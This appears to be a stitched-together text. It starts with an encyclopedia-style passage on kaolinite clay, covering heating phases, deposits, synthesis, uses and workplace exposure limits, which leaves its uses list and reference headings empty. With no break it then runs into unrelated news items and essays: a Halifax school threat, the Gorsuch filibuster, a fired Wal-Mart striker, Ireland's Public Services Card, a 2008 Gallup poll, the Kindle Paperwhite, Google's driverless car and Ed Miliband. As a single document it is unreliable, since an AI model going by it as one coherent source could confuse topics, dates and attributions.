Kaolinite group clays undergo a series of phase transformations upon thermal treatment in air at atmospheric pressure.
Drying [ edit ]
Below 100 °C (212 °F), exposure to dry air will slowly remove liquid water from the kaolin. The end-state for this transformation is referred to as "leather dry". Between 100 °C and about 550 °C (1,022 °F), any remaining liquid water is expelled from kaolinite. The end state for this transformation is referred to as "bone dry". Throughout this temperature range, the expulsion of water is reversible: if the kaolin is exposed to liquid water, it will be reabsorbed and disintegrate into its fine particulate form. Subsequent transformations are not reversible, and represent permanent chemical changes.
Metakaolin [ edit ]
Endothermic dehydration of kaolinite begins at 550–600 °C producing disordered metakaolin, but continuous hydroxyl loss is observed up to 900 °C (1,650 °F).[12] Although historically there was much disagreement concerning the nature of the metakaolin phase, extensive research has led to a general consensus that metakaolin is not a simple mixture of amorphous silica (SiO 2 ) and alumina (Al 2 O 3 ), but rather a complex amorphous structure that retains some longer-range order (but not strictly crystalline) due to stacking of its hexagonal layers.[12]
Al 2 Si 2 O 5 (OH) 4 → Al 2 Si 2 O 7 + 2 H 2 O.
Spinel [ edit ]
Further heating to 925–950 °C converts metakaolin to an aluminium-silicon spinel which is sometimes also referred to as a gamma-alumina type structure:
2 Al 2 Si 2 O 7 → Si 3 Al 4 O 12 + SiO 2 .
Platelet mullite [ edit ]
Upon calcination above 1050 °C, the spinel phase nucleates and transforms to platelet mullite and highly crystalline cristobalite:
3 Si 3 Al 4 O 12 → 2 (3 Al 2 O 3 + 2 SiO 2 ) + 5 SiO 2 .
Needle mullite [ edit ]
Finally, at 1400 °C the "needle" form of mullite appears, offering substantial increases in structural strength and heat resistance. This is a structural but not chemical transformation. See stoneware for more information on this form.
Occurrence [ edit ]
Kaolinite is one of the most common minerals; it is mined, as kaolin, in Malaysia, Pakistan, Vietnam, Brazil, Bulgaria,Bangladesh, France, the United Kingdom, Iran, Germany, India, Australia, Korea, the People's Republic of China, the Czech Republic, Spain, South Africa, and the United States.[1]
Mantles of kaolinitic saprolite are common in Western and Northern Europe. The ages of these mantles are Mesozoic to Early Cenozoic.[13]
Kaolinite clay occurs in abundance in soils that have formed from the chemical weathering of rocks in hot, moist climates—for example in tropical rainforest areas. Comparing soils along a gradient towards progressively cooler or drier climates, the proportion of kaolinite decreases, while the proportion of other clay minerals such as illite (in cooler climates) or smectite (in drier climates) increases. Such climatically-related differences in clay mineral content are often used to infer changes in climates in the geological past, where ancient soils have been buried and preserved.[citation needed]
In the Institut National pour l'Etude Agronomique au Congo Belge (INEAC) classification system, soils in which the clay fraction is predominantly kaolinite are called kaolisol (from kaolin and soil).[14]
In the US, the main kaolin deposits are found in central Georgia, on a stretch of the Atlantic Seaboard fall line between Augusta and Macon. This area of thirteen counties is called the "white gold" belt; the small town of Sandersville is known as the "Kaolin Capital of the World" due to its abundance of kaolin.[15][16] In the late 1800s, an active kaolin surface-mining industry existed in the extreme southeast corner of Pennsylvania, near the towns of Landenberg and Kaolin, and in what is present-day White Clay Creek Preserve. The product was brought by train to Newark, Delaware, on the Newark-Pomeroy line, along which can still be seen many open-pit clay mines. The deposits were formed between the late Cretaceous and early Paleogene, about 100 million to 45 million years ago, in sediments derived from weathered igneous and metakaolin rocks.[17] Kaolin production in the US during 2011 was 5.5 million tons.[18]
During the Paleocene–Eocene Thermal Maximum sediments were enriched with kaolinite from a detrital source due to denudation.[19]
Synthesis and genesis [ edit ]
Difficulties are encountered when trying to explain kaolinite formation under atmospheric conditions by extrapolation of thermodynamic data from the more successful high-temperature syntheses (as for example Meijer and Van der Plas, 1980[20] have pointed out). La Iglesia and Van Oosterwijk-Gastuche (1978)[21] thought that the conditions under which kaolinite will nucleate can be deduced from stability diagrams based as these are on dissolution data. Because of a lack of convincing results in their own experiments, La Iglesia and Van Oosterwijk-Gastuche (1978) had to conclude, however, that there were other, still unknown, factors involved in the low-temperature nucleation of kaolinite. Because of the observed very slow crystallization rates of kaolinite from solution at room temperature Fripiat and Herbillon (1971) postulated the existence of high activation energies in the low-temperature nucleation of kaolinite.
At high temperatures, equilibrium thermodynamic models appear to be satisfactory for the description of kaolinite dissolution and nucleation, because the thermal energy suffices to overcome the energy barriers involved in the nucleation process. The importance of syntheses at ambient temperature and atmospheric pressure towards the understanding of the mechanism involved in the nucleation of clay minerals lies in overcoming these energy barriers. As indicated by Caillère and Hénin (1962)[22] the processes involved will have to be studied in well-defined experiments, because it is virtually impossible to isolate the factors involved by mere deduction from complex natural physico-chemical systems such as the soil environment. Fripiat and Herbillon (1971),[23] in a review on the formation of kaolinite, raised the fundamental question how a disordered material (i.e., the amorphous fraction of tropical soils) could ever be transformed into a corresponding ordered structure. This transformation seems to take place in soils without major changes in the environment, in a relatively short period of time and at ambient temperature (and pressure).
Low-temperature synthesis of clay minerals (with kaolinite as an example) has several aspects. In the first place the silicic acid to be supplied to the growing crystal must be in a monomeric form, i.e., silica should be present in very dilute solution (Caillère et al., 1957;[24] Caillère and Hénin, 1962; Wey and Siffert, 1962;[25] Millot, 1970[26]). In order to prevent the formation of amorphous silica gels precipitating from supersaturated solutions without reacting with the aluminium or magnesium cations to form crystalline silicates, the silicic acid must be present in concentrations below the maximum solubility of amorphous silica. The principle behind this prerequisite can be found in structural chemistry: "Since the polysilicate ions are not of uniform size, they cannot arrange themselves along with the metal ions into a regular crystal lattice" (Iler, 1955, p. 182[27]).
The second aspect of the low-temperature synthesis of kaolinite is that the aluminium cations must be hexacoordinated with respect to oxygen (Caillère and Hénin, 1947;[28] Caillère et al., 1953;[29] Hénin and Robichet, 1955[30]). Gastuche et al. (1962),[31] as well as Caillère and Hénin (1962) have concluded, that only in those instances when the aluminium hydroxide is in the form of gibbsite, kaolinite can ever be formed. If not, the precipitate formed will be a "mixed alumino-silicic gel" (as Millot, 1970, p. 343 put it). If this were the only requirement, large amounts of kaolinite could be harvested simply by adding gibbsite powder to a silica solution. Undoubtedly a marked degree of sorption of the silica in solution by the gibbsite surfaces will take place, but, as stated before, mere adsorption does not create the layer lattice typical of kaolinite crystals.
The third aspect is that these two initial components must be incorporated into one and the same mixed crystal with a layer structure. From the following equation (as given by Gastuche and DeKimpe, 1962)[32] for kaolinite formation
2 Al(OH) 3 + 2 H 4 SiO 4 → Si 2 O 5 .2 Al(OH) 3 + 5 H 2 O
it can be seen, that five molecules of water must be removed from the reaction for every molecule of kaolinite formed. Field evidence illustrating the importance of the removal of water from the kaolinite reaction has been supplied by Gastuche and DeKimpe (1962). While studying soil formation on a basaltic rock in Kivu (Zaïre), Gastuche and DeKimpe noted how the occurrence of kaolinite depended on the "degrée de drainage" of the area involved. A clear distinction was found between areas with good drainage (i.e., areas with a marked difference between wet and dry seasons) and those areas with poor drainage (i.e., perennially swampy areas). Only in the areas with distinct seasonal alternations between wet and dry conditions kaolinite was found. The possible significance of alternating wet and dry conditions on the transition of allophane into kaolinite has been stressed by Tamura and Jackson (1953).[33] The role of alternations between wetting and drying on the formation of kaolinite has also been noted by Moore (1964).[34]
Laboratory syntheses [ edit ]
Syntheses of kaolinite at high temperatures (more than 100 °C [212 °F]) are relatively well known. There are for example the syntheses of Van Nieuwenberg and Pieters (1928);[35] Noll (1934);[36] Noll (1936);[37] Norton (1939);[38] Roy and Osborn (1954);[39] Roy (1961);[40] Hawkins and Roy (1962);[41] Tomura et al. (1985);[42] Satokawa et al. (1994)[43] and Huertas et al. (1999).[44] Relatively few low-temperature syntheses have become known (cf. Brindley and DeKimpe (1961);[45] DeKimpe (1969);[46] Bogatyrev et al. (1997)[47]).
Laboratory syntheses of kaolinite at room temperature and atmospheric pressure have been described by DeKimpe et al. (1961).[48] From those tests the role of periodicity becomes convincingly clear. For DeKimpe et al. (1961) had used daily additions of alumina (as AlCl 3 . 6 H 2 O) and silica (in the form of ethyl silicate) during at least two months. In addition adjustments of the pH took place every day by way of adding either hydrochloric acid or sodium hydroxide. Such daily additions of Si and Al to the solution in combination with the daily titrations with hydrochloric acid or sodium hydroxide during at least 60 days will have introduced the necessary element of periodicity. Only now the actual role of what has been described as the "aging" (Alterung) of amorphous alumino-silicates (as for example Harder, 1978[49] had noted) can be fully understood. For time as such is not bringing about any change in a closed system at equilibrium, but a series of alternations, of periodically changing conditions (by definition taking place in an open system), will bring about the low-temperature formation of more and more of the stable phase kaolinite instead of (ill-defined) amorphous alumino-silicates.
Uses [ edit ]
The main use of the mineral kaolinite (about 50% of the time) is the production of paper; its use ensures the gloss on some grades of coated paper.[50]
Kaolin is also known for its capabilities to induce and accelerate blood clotting. In April 2008 the US Naval Medical Research Institute announced the successful use of a kaolinite-derived aluminosilicate infusion in traditional gauze, known commercially as QuikClot Combat Gauze,[51] which is still the hemostat of choice for all branches of the US military.
Kaolin is used (or was used in the past):
Geophagy [ edit ]
Humans sometimes eat kaolin for health or to suppress hunger,[57] a practice known as geophagy. Consumption is greater among women, especially during pregnancy.[58] This practice has also been observed within a small population of African-American women in the Southern United States, especially Georgia.[59][60] There, the kaolin is called white dirt, chalk or white clay.[59]
Safety [ edit ]
People can be exposed to kaolin in the workplace by breathing in the powder or from skin or eye contact.
United States [ edit ]
The Occupational Safety and Health Administration (OSHA) has set the legal limit (permissible exposure limit) for kaolin exposure in the workplace as 15 mg/m3 total exposure and 5 mg/m3 respiratory exposure over an 8-hour workday. The National Institute for Occupational Safety and Health (NIOSH) has set a recommended exposure limit (REL) of 10 mg/m3 total exposure TWA 5 mg/m3 respiratory exposure over an 8-hour workday.[61]
See also [ edit ]
References [ edit ]
Citations [ edit ]
CTV Atlantic
Halifax Police have charged a teenager in relation to an incident Wednesday at two schools in Dartmouth. Police were called to Dartmouth High School on Victoria Road around 10:30 a.m after a threat was made to one of its students.
The Halifax Regional School Board says a girl at the school notified administration that a student had received threatening text messages from someone who isn't a student at the school.
Dartmouth High and nearby Bicentennial Junior High were placed in hold-and-secure. Students were told to stay in their classrooms with the lights off while police searched for the man.
An 18-year-old was arrested at a nearby gas station on Main Street without incident. He's facing charges of public mischief and is expected to appear in court at a later date.
The lockdown ended around 11:30 a.m. and lasted for about half an hour.
AP Photo On The Bench Schumer's Folly Democrats are heading toward an epic miscalculation in filibustering Neil Gorsuch.
Liam Donovan (@lpdonovan) is a former NRSC staffer who currently serves as director of legislative and political affairs for a D.C.-based trade association.
After three days of breezily proficient testimony before the Senate Judiciary Committee, Judge Neil Gorsuch emerged unscathed. The high court nominee deftly parried the barbed queries that came his way, calmly defusing and in some cases disarming his more heated inquisitors on the dais. The proceedings as a whole were anticlimactic, particularly in light of the frenzied health-care drama playing out on the other side of Capitol Hill. And yet less than 12 hours after the Judiciary Committee wrapped up its work for the week, Minority Leader Chuck Schumer took to the floor of the Senate to announce his intention to deny Gorsuch cloture, calling on his colleagues to join him in a procedural blockade of the judge's nomination and daring Republicans to change the longstanding rules of the chamber.
As to whether his members will answer the call to filibuster Gorsuch, the signals to date have been mixed. While purple-state centrists like Florida Sen. Bill Nelson have flashed uncharacteristic resolve, liberal stalwart and former Judiciary Committee chairman Patrick Leahy of Vermont indicated that he was “not inclined” to deny the nominee an up or down vote. The fate of the gambit will hinge on the intentions of nearly 20 remaining holdouts from various wings of the party.
Story Continued Below
In the midst of the hearings, a few Democrats even floated a deal to confirm the 10th Circuit judge in exchange for a commitment from the GOP not to go nuclear on a hypothetical future vacancy—though Schumer quickly shot them down. On one level, the proffer makes sense—it's always better to be for what's inevitably going to happen, particularly if it means you can extract concessions in return.
But with the spectacular collapse of the GOP health care bill last week and signs of continued deterioration in President Trump's standing in public opinion polls in the interim, Democrats feel the wind at their backs. There is little Trump and his party could offer that would make it worth the grief they'll inevitably face from their own voters for standing down. And given the GOP's recent propensity for self-immolation, who is to say they won't screw this up?
The problem for Schumer and his caucus is this: Republicans are not bluffing when they say Gorsuch will be on the court one way or another. The squishes, the institutionalists, even the erstwhile “Gang” members are unwavering in their support. Gorsuch is well-qualified for the job, acquitted himself admirably by any measure, and if an unprecedented partisan filibuster is the only thing standing between him and the bench, the Reid Rule will be invoked for the second time.
But saying Republicans have the political will to put Gorsuch on the court is different than saying there are 50 GOP senators who are otherwise prepared to end the filibuster. Their appetite is entirely a function of circumstance. Were Democrats to lay off Gorsuch, keeping their powder dry for the future and maintaining the moral high ground, it would be rather easy to imagine the Susan Collinses, John McCains and Lindsey Grahams of the world getting cold feet with a lesser Trump pick, particularly one who shifts the balance of the court rather than maintaining it. Which is to say that Gorsuch's nomination is something of a perfect storm for GOP procedural fortitude. Only seeing such a model jurist held hostage to cynical political whims would be enough to compel the righteous indignation necessary to go nuclear. (I'll pause here so my friends on the left can let out a primal scream for poor Merrick Garland.)
The cloture rule now faces an existential paradox. Call it Schrödinger's Filibuster. Assuming Schumer can hold the line within his caucus—and he has seven votes to give—the 60 vote threshold for Supreme Court nominations is dead. Do the right thing and it lives to see another day.
It's unclear whether Democrats think Senate Majority Leader Mitch McConnell will blink or if they simply believe the filibuster's demise is inevitable. Indeed, they themselves likely would have been forced to go nuclear under a President Hillary Clinton. So perhaps it was just a matter of time.
What's apparent is that their agitated and increasingly emboldened base is unlikely to care either way. The imperative of The Resistance is unambiguous, however quixotic the mission. Collaboration will not be tolerated, a message thousands delivered to Schumer's Brooklyn doorstep mere weeks ago.
As a matter of political calculation, this is all well and good. Turnabout is fair play, and whatever the short-term ramifications, a majoritarian body will one day benefit Schumer's party. But given the structural realities of the Senate map—Democrats are defending 25 seats in 2018, 10 of them in states they failed to carry last fall, compared to just 9 and one for Republicans—the “short term” horizon runs through 2020 at the very least. In the meantime, they're not only paving the path for less qualified nominees in the likelihood of future Trump-era vacancies, they're needlessly greasing an already slippery procedural slope. With GOP efforts stymied thus far in part by the specter of the Senate parliamentarian—the arbiter of what can pass majoritarian muster under reconciliation—how long until pressure mounts to change the rules for legislation? Given the tenor of the first two months of this administration, I suspect many Democrats aren't terribly sanguine about the prospect of unchecked GOP control for the remaining 46.
Just a few short months ago, Leader Schumer was publicly lamenting his predecessor's judicial power play; today he seems poised to reprise Reid's folly, only this time with far greater stakes. If Democrats truly believe their rhetoric about the current political moment and the existential threat President Trump poses, daring reluctant Senate Republicans to erode the remaining norms that empower the minority is as myopic as it is gratuitous.
A photo of the author Why I'm standing up to Wal-Mart For six years, I worked for the company. But when I decided to strike, they fired me. Now I'm firing back
I remember the moment when I first began to fight back against Wal-Mart. The Placerville, Calif., store where I worked was getting ready for a visit from corporate management, and four of us were assigned to the overnight shift. We had to rearrange merchandise aisles, since the company had spent hundreds of dollars to redecorate the store with fake flowers, plastic table covers, glass vases and glossy photos. It looked to me like our managers wanted to put on a real show.
It's Wal-Mart policy that employees working the night shift earn an additional dollar after three weeks. But when our third week approached, the management switched us back to the day shift. What a pointless exercise: In the end, the corporate executives didn't show up, and we didn't get the extra dollar we deserved. It wasn't fair — and I was sick of it.
Advertisement:
This certainly wasn't the first time I'd experienced the short end of Wal-Mart's last-minute policy changes. After six years, I'd had it up to my eyeballs with erratic policy shuffles and a lack of respect for its associates.
For the longest time I rationalized to myself: I needed this job. As a single mom, I did whatever it took to keep a roof over our heads, even if that meant shelving electronics and housewares for $12.05 an hour. But I also knew that as a mother, I needed to stand up for what was right, even if it meant taking on our country's biggest private employer.
Don't get me wrong — I love my job and customers. But no matter how hard I worked, I still didn't make enough to afford even basic necessities like food, rent and clothing for my kids. And despite the years I've invested there, I was never guaranteed 40 hours a week. Sometimes, I was scheduled as few as eight hours a week. I had to visit three different local food banks one month just to feed my family. Eventually, I had to turn to food stamps.
I'm not alone. When I started talking to my colleagues, it was surprising to find how much we all struggled, scraping by on poverty wages. I've spoken to Wal-Mart employees who drove from California to Mexico for access to affordable healthcare. And even worse, plenty just skipped the doctor altogether when they were sick. (I could barely afford the healthcare, which was $72 out of monthly checks that were as low as $600.) And while we struggle, Wal-Mart continues to make $16 billion in profits each year.
But rather than make changes for associates, it seemed to me like Wal-Mart instead retaliated against those of us who would speak out.
And so I resolved to fight. In June, I joined more than 100 associates who went on strike and traveled to Wal-Mart's annual meeting in Arkansas to let shareholders know what was going on. We were protesting what we believed to be Wal-Mart's attempts to silence workers who speak out for better jobs.
Advertisement:
Many of my fellow strikers lost their jobs. We were simply exercising our constitutional freedom to fight for a better life and better working conditions inside a company that has benefited extravagantly from our labor. And the company that so regularly promotes its American values responded in a manner that seems fundamentally un-American and unfair.
I grew angrier, and my fights grew louder. I joined other working moms at a sit-in at Wal-Mart board director Marissa Mayer's Yahoo office, because she has been silent while Wal-Mart breaks the law. I refused to leave until Mayer heard my concerns, and I was arrested. The next day, I publicly confronted Mayer at Yahoo's shareholder meeting about Wal-Mart's illegal termination.
I am glad to be standing up, proud to be speaking up for something that was clearly wrong. There is just too much at stake to sit on the sidelines.
And when I got home from my trip to try to speak with Ms. Mayer — I was fired.
Wal-Mart claims it fired me, and fired or disciplined my co-workers, for “no call, no show” when we were on a legally protected strike in June. While the move wasn't surprising, I believe it was against the law, which is why I am part of a nationwide unfair labor practice charge that was filed on July 1.
Advertisement:
While Wal-Mart continues its bullying and probably thinks it has heard the last from me, I want the company, fellow associates and all our supporters to know that I am still fighting for what's right.
I'm not afraid, because I know my co-workers and my community have my back. Several of us are in Washington, D.C., this week to strengthen our calls for better jobs and to call for our jobs back.
I am overwhelmed by the outpouring of support we have from thousands of supporters nationwide, and we'll keep fighting and standing strong until Wal-Mart remembers to value the thing that made the company strong in the first place: Real people like me.
Advertisement:
Wal-Mart responds: "Like any company, Walmart has an attendance policy that helps ensure our customers are being taken care of. Any reasonable person would agree that if someone is scheduled to work, they are expected to show up or call to say why they can't make it in. When someone fails to work their shift, it's disrespectful to managers and co-workers alike. It creates extra work for our associates who do come to work when they're scheduled. And, as a result, it can also prevent us from being able to give the best possible service to each of our customers.
We evaluate every situation individually but, as a general matter, the law does not protect hit-and-run intermittent work stoppages that are part of a coordinated union plan. Ms. Collins was terminated for violations associated with our attendance policy.
Our attendance policy is based on the accumulation of a certain number of absence-related occurrences in a rolling six-month period. Once an associate exceeds a certain threshold, a multi-step discipline process kicks in. Under this policy and process, she had prior notice that continued absences would lead to termination. Our decision had nothing to do with a specific protest." -- Dan Fogleman, Wal-Mart spokesperson
Privacy campaigners have expressed concern that a plan by the Government to make all citizens applying for a passport and a driving licence first obtain a State-issued public services card represents the introduction of a “national ID card by stealth”.
Minister for Public Expenditure and Reform Paschal Donohoe confirmed that all passport applicants will be required to have a Public Services Card (PSC) from the autumn, although he insisted it “is not and will not be” compulsory for citizens to get the card.
The Road Safety Authority confirmed that all applicants for driving licences will be required to have the card from early next year.
TJ McIntyre, a UCD law lecturer and chairman of the civil liberties group Digital Rights Ireland, said he was concerned at the plans.
“It appears to be a policy of introducing a national ID card by stealth, in a way which appears to be illegal,” he said.
The card, rolled out as a pilot in 2011, has been issued to over 2.5 million Irish citizens – initially to those claiming welfare benefits. The database used to administer provision of the PSC draws on information from across government departments.
The Department of Social Protection says claimants who do not comply with the stringent registration process for issuing the card may have their payments, including child benefit or free travel, suspended.
Registration process
Some of the cards have been issued by post, without a face-to-face registration process. The Government says these cards used citizens' passport photographs from the Department of Foreign Affairs, with their consent.
The sharing of personal data by public bodies was the subject of a ruling by the Court of Justice in 2015 that citizens' personal data may not be transferred between public bodies without them having been informed in advance.
Mr Donohoe said the Government took its duties with regard to data protection “very seriously” and that all processing of citizens' data under the projects had a legislative underpinning.
A draft scheme of a new Data Sharing and Governance Bill, which the Minister said he would like to have passed this year before a new EU regulation takes effect next May, comes before the Oireachtas Committee on Finance again on Tuesday.
PRINCETON, NJ -- Gallup Poll Daily tracking has documented a surge in Democratic voters' support for Barack Obama over Hillary Clinton in recent days, swelling from a four percentage-point lead for Obama during the first part of May to a record 16-point lead for him in polling from May 16-18.
Prior to now, Obama's largest lead over Clinton was 11 percentage points, achieved briefly in mid-April. However, for most of the past month, Clinton and Obama have been fairly closely matched, with neither sustaining a significant lead for more than a few days. It thus remains to be seen whether this improvement in Obama's standing is a variation of the same pattern, or represents a turning point in the race.
Obama Swamps Clinton Among Young Voters and Others
The broadening of Obama's appeal for the nomination seen in Gallup's May 16-18 polling is fairly widespread, with the percentage favoring him increasing among most demographic categories of Democratic voters. However, as a result, certain groups that were already highly supportive of Obama for the nomination -- men, 18- to 29-year-olds, postgrads, and upper-income Democrats -- are now overwhelmingly in his camp. Obama is currently favored among these groups by a 2-to-1 margin, or better, over Clinton.
At the same time, support for Clinton among some of her traditionally stalwart support groups -- women, Easterners, whites, adults with no college education, and Hispanics -- has fallen below 50%.
The only major demographic group still supporting Clinton to the tune of 51% or more is women aged 50 and older. This group's preferences have changed little during May, at the same time that Clinton's support among younger men (those 18 to 49) has declined by nearly 10 points.
Bottom Line
After nearly 20 grueling weeks on the campaign trail since he shook up the Democratic primary race by winning the Iowa caucuses, Obama has finally stretched his lead over his chief rival into the teens.
Having previously captured nearly the maximum level of support from black voters, Obama's latest gains have come from a broad spectrum of rank-and-file Democrats. At least for now, he has expanded his position as the preferred candidate of men, young adults, and highly educated Democrats, and has erased Clinton's advantages with most of her prior core constituency groups, including women, the less well-educated, and whites.
Survey Methods
For the Gallup Poll Daily tracking survey, Gallup is interviewing no fewer than 1,000 U.S. adults nationwide each day during 2008.
The Democratic nomination results for May 1-13, 2008, are based on interviews with 5,474 Democratic and Democratic-leaning voters. The maximum margin of sampling error for samples of this size is ±1 percentage point.
The Democratic nomination results for May 16-18, 2008, are based on interviews with 1,261 Democratic and Democratic-leaning voters. The maximum margin of sampling error for samples of this size is ±3 percentage points.
Interviews are conducted with respondents on land-line telephones (for respondents with a land-line telephone) and cellular phones (for respondents who are cell-phone only).
In addition to sampling error, question wording and practical difficulties in conducting surveys can introduce error or bias into the findings of public opinion polls.
To provide feedback or suggestions about how to improve Gallup.com, please e-mail feedback@gallup.com.
The £109 Paperwhite is Amazon's first backlit Kindle to launch in the UK, and will ship on October 25 to customers who preorder it from today.
The Lending Library will mean up to one book per month can be borrowed from a selection of 200,000 and read free on all Kindles, Amazon said. Lending Library members must join Amazon's premium delivery service, called Prime, for £49 per year. Only one book can be borrowed at a time, but existing Prime customer will get the additional service free.
Jeff Bezos, Amazon's founder and chief executive, said “We're already seeing the programme's success in the US for both readers and authors—customers are reading more and authors are reaching a whole new audience while making money in a new way.”
Amazon's touchscreen Paperwhite offers a manually-adjusted backlight and higher definition than its predecessors. Like the Lending Library it has also already been launched in America. Its battery lasts for up to eight weeks and it is also available with a 3G connection for £169
Rival ereaders with backlights, such as the Nook Glowlight, have already launched in the UK, although reviewers in America, including at Wired and Engadget, have largely hailed the Paperwhite as the current market leader. Amazon's cheapest Kindle, however, remains the £69 model, called simply the Kindle. The touchscreen version is £109 and a model with a keyboard costs £149.
In a telephone press conference earlier today, Google went into further detail about its first-ever prototype for a purpose-built driverless car. Unlike the modified Priuses and other commercially-available models that have already racked up more than 700,000 miles on public roads, the plucky two-seat electric microcar featured in Google's introductory video was designed from day one (which was roughly a year and a half ago) to contain passengers, rather than drivers.
The coolest revelation, to me, is how squishy this prototype is. The front end and windshield are soft, to reduce the amount of damage inflicted on pedestrians and bicyclists. Whether this feature makes sense for other iterations of robotic cars is anyone's guess. Since the unnamed Google car is restricted to speeds of 25 mph or less, crashworthiness at highway speeds isn't a concern.
The most disappointing revelation, however, is that the robo-car in the video is something of a stunt. The real thing, which will hit closed courses this summer, and public roads by the end of the year, will still have a steering wheel. It'll have a brake and gas pedal, too, but it's the steering wheel that I'm obsessed with. Or the planned lack of it.
Think about that smooth plane, where the steering column should be. There are multitudes in that design choice. While automakers hedge their bets, and insist that autonomy will appear in increments, Google isn't waiting. It wants its idyllic, automated world, and it wants it now.
I do too. I want my four-year-old daughter to grow up in an era when dying in a car is a freak event, as chilling and unlikely as being struck by lightning. I want my grandchildren to read about a time when 33,000 people were killed every year on American roads, and not understand how any of us got into a car without crumpling into a panic attack.
A world without steering wheels would be a kind of automotive utopia, and one worth rooting for.
But don't think it'll be easy. No one, not even Google, can cure the common car crash without help. If we want this particular utopia, we're going to have to fight for it.
* * *
When you yank the steering wheel out of every car, strange things shake loose.
Traffic stops disappear. Your self-driving car is a consummate goody two-shoes, and can't bring itself to speed, blow a stop sign, or even change lanes without signaling. Speed traps will become obsolete, and local municipalities will have to abandon a small but notable source of revenue. And yet, accidents will still happen. Hardware will fail, winter roads will glaze over, and robots will collide. So traffic laws will have to be rewritten, as well as insurance policies. The tangled economics and legality of car insurance will be dramatically transformed, if not innovated out of existence. Unless you're in the business of insuring cars, or handing out tickets, this is fabulous news.
Likewise, no one will mourn the loss of the DMV (or RMV, as the case may be). Remember, everything about the robotic car is an indictment of biological driving. If the goal is to reduce human error, as well as the deaths and dismemberments that result from it, why allow any portion of humanity to opt out, and assume manual control? According to Chris Urmson, the director of Google's self-driving car project, the team had to decide how to address “the problem of debugging the human,” or allowing the car to function autonomously, while also keeping the driver alert enough to take over in case of an emergency. “People would trust the technology more than it was ready to be trusted,” says Urmson. "We could either spend time trying to work on the human factors problem, or we could really take a bigger step forward, on the fully self-driving capability.” Google's solution is to lose the steering wheel, at least on subsequent versions of this vehicle (after the 100-strong fleet of models with manual controls have been thoroughly tested). For the rest of us, that means surrendering to the notion that driver skills will degrade, and passing nationwide legislation that effectively destroys the institutions that regulate the ability to operate a motor vehicle.
But some decisions and outcomes won't be quite as easy, or as gleeful, as the controlled demolition of the country's DMV offices. What happens, for example, when only some cars are dutifully, algorithmically obeying the rules of the road, while the non-robotic holdouts ping-pong across the highway, treating the robots like the pushovers they're programmed to be? If autonomous vehicles always strive to avoid a collision, then what will prevent human drivers from constantly cutting them off, or bullying their way through stop-and-go traffic? A single person could disrupt the best laid plans of an entire roadway of machines.
Fortunately, Google is already actively preparing its vehicles to handle problem drivers. Urmson says that current test drivers note when potential, human-error-based incidents force them to take over. Those incidents are then reconstructed in simulators, to figure out how the robot would have responded, and how to improve that response in future situations.
But to realize the full potential benefits of automated driving, from thousands of lives saved annually to cutting total gas consumption in the U.S. by 2 percent (or 2.9 billion gallons per year), every steering wheel must go. Robots can't draft behind each other if yet another non-autonomous jerk is muscling into their formation, or magically teleport away from the blacked-out drunk drifting across the center line.
Robots also can't, for the moment, be trusted to navigate every single road they come across—a clear prerequisite for a vehicle with no steering wheel. Routes that haven't been painstakingly (and recently) mapped with laser rangefinders, are in GPS dead zones, or have lost their lane markings to time and weather, are all potential problems. These paths will become rarer, as robo-cars improve, and LIDAR maps become more comprehensive. Then again, American infrastructure isn't exactly known for this pristine bill of health. Robots will balk at some percentage of these crumbling, off-grid byways. If manual control was an option, this wouldn't be an issue. But just as removing steering wheels sets off a chain reaction of society-wide changes, reattaching them is anything but trivial. Forcing humans to drive roads too challenging for a machine means resurrecting the dreaded DMV, and hoping that atrophied skills instantly snap back into shape.
The real solution might not be something that Google, or any tech company, can supply. And depending on your political inclinations, it might not be a solution at all. In 1956, the Federal Highway Act authorized the Interstate Highway System, kicking off more than 35 years of infrastructure construction and investment, with a total estimated cost of roughly $435 billion. The result was a matrix of roads that revolutionized transportation in the U.S. and whose economic benefits are immeasurable.
An equivalent, national undertaking to automate our roads could be just as monumental. Admittedly, there are no cost estimates for shoring up our road infrastructure to meet automated standards and incentivizing the purchase of autonomous cars. We talk about networking the road to the cars, and the cars to each other, without having a sense of the collective price tag. There's also no way to gauge the amount of political will necessary to effectively outlaw human drivers, or how such an initiative could survive the first few stories of humans watching, helplessly, as their self-steering cars malfunction themselves into a tree. And yet, imagine what the country might look like, when all that work is done? How much more productive would millions of commuters be? How much money would ultimately be saved, and how much less blood pooled on the asphalt, every single day?
That's one option. Happily, it's not the only one. But whatever work has to be done, and by whom, it seems clear that full autonomy won't be as simple as blithely building a car without a steering wheel, and hoping that everyone buys one. The automotive world responds to radical technological propositions slowly, if at all. It took well over a century for electric cars to become viable products, and they still comprise a razor-thin sliver of the market's total pie. Driverless cars could follow a similar track, and crawl towards universal adoption over the next hundred years. But if we don't to wait a lifetime for the robotic utopia that Google is offering, humans will have to pave the way.
Ed Miliband has been confronted by a disgruntled voter for failing to give the “working class man” a say on Europe.
Peter Baldwin, an aircraft electrician at BAE Systems in Lancashire, challenged the Labour leader over his failure to back a vote on Britain's membership of the European Union during a factory visit.
He said the party's refusal to propose a referendum was putting him off voting Labour and warned that the scale of immigration was forcing British workers out of jobs.
The episode, caught on camera by the BBC, has echoes of the moment Gordon Brown got challenged over immigration while campaigning in Rochester by Gillian Duffy.
It came as Mr Miliband was being introduced to workers at the jet fighter factory in front of the cameras.
“At this moment in time I don't feel like voting Labour,” Mr Baldwin told the Labour leader when they met.
Asked by Mr Miliband what his “biggest issues” with the party were, Mr Baldwin continued: “This morning we were sat in the brewery over there [for workers].
“They're all leaning now towards Ukip. Now, the question on everybody's mind is the referendum. I know what you're going to say, but the working class man in here wants to have a say.”
Mr Miliband begun to outline Labour's immigration policy of ensuring wages are not undercut by low-skilled immigration.
“But there's too many people here. That's why we've got all these people out of work. There's too many people here,” Mr Baldwin responded.
The Labour leader eventually thanked the engineer and moved on without discussing the possibility of an EU referendum.
It came on the same day Mr Miliband challenged the Prime Minister to outline his plan for renegotiating more powers from Europe ahead of a referendum on Britain's membership.
The Labour leader claimed Mr Cameron has caused “a great deal of uncertainty” for business by proposing a vote on Europe by the end of 2017.
“More than two years have passed since you promised to set out in detail your plan to renegotiate Britain's relationship with Europe,” Mr Miliband said.
“But you have still not given any more than the broadest of hints what reforms you want, how you expect to achieve them, or what people would be voting on in a referendum for which for you have set an arbitrary deadline of 2017.
“You will not even state whether you would still be advocating the UK remaining in Europe.
“I am writing today to urge you to make good on your commitment to set out in detail a reform agenda for the EU and a strategy for building the alliances needed to deliver it.”
Grant Shapps, the Conservative Party Chairman, responded to the letter by saying there was “no greater uncertainty” for businesses and families than the last Labour government's economic record.
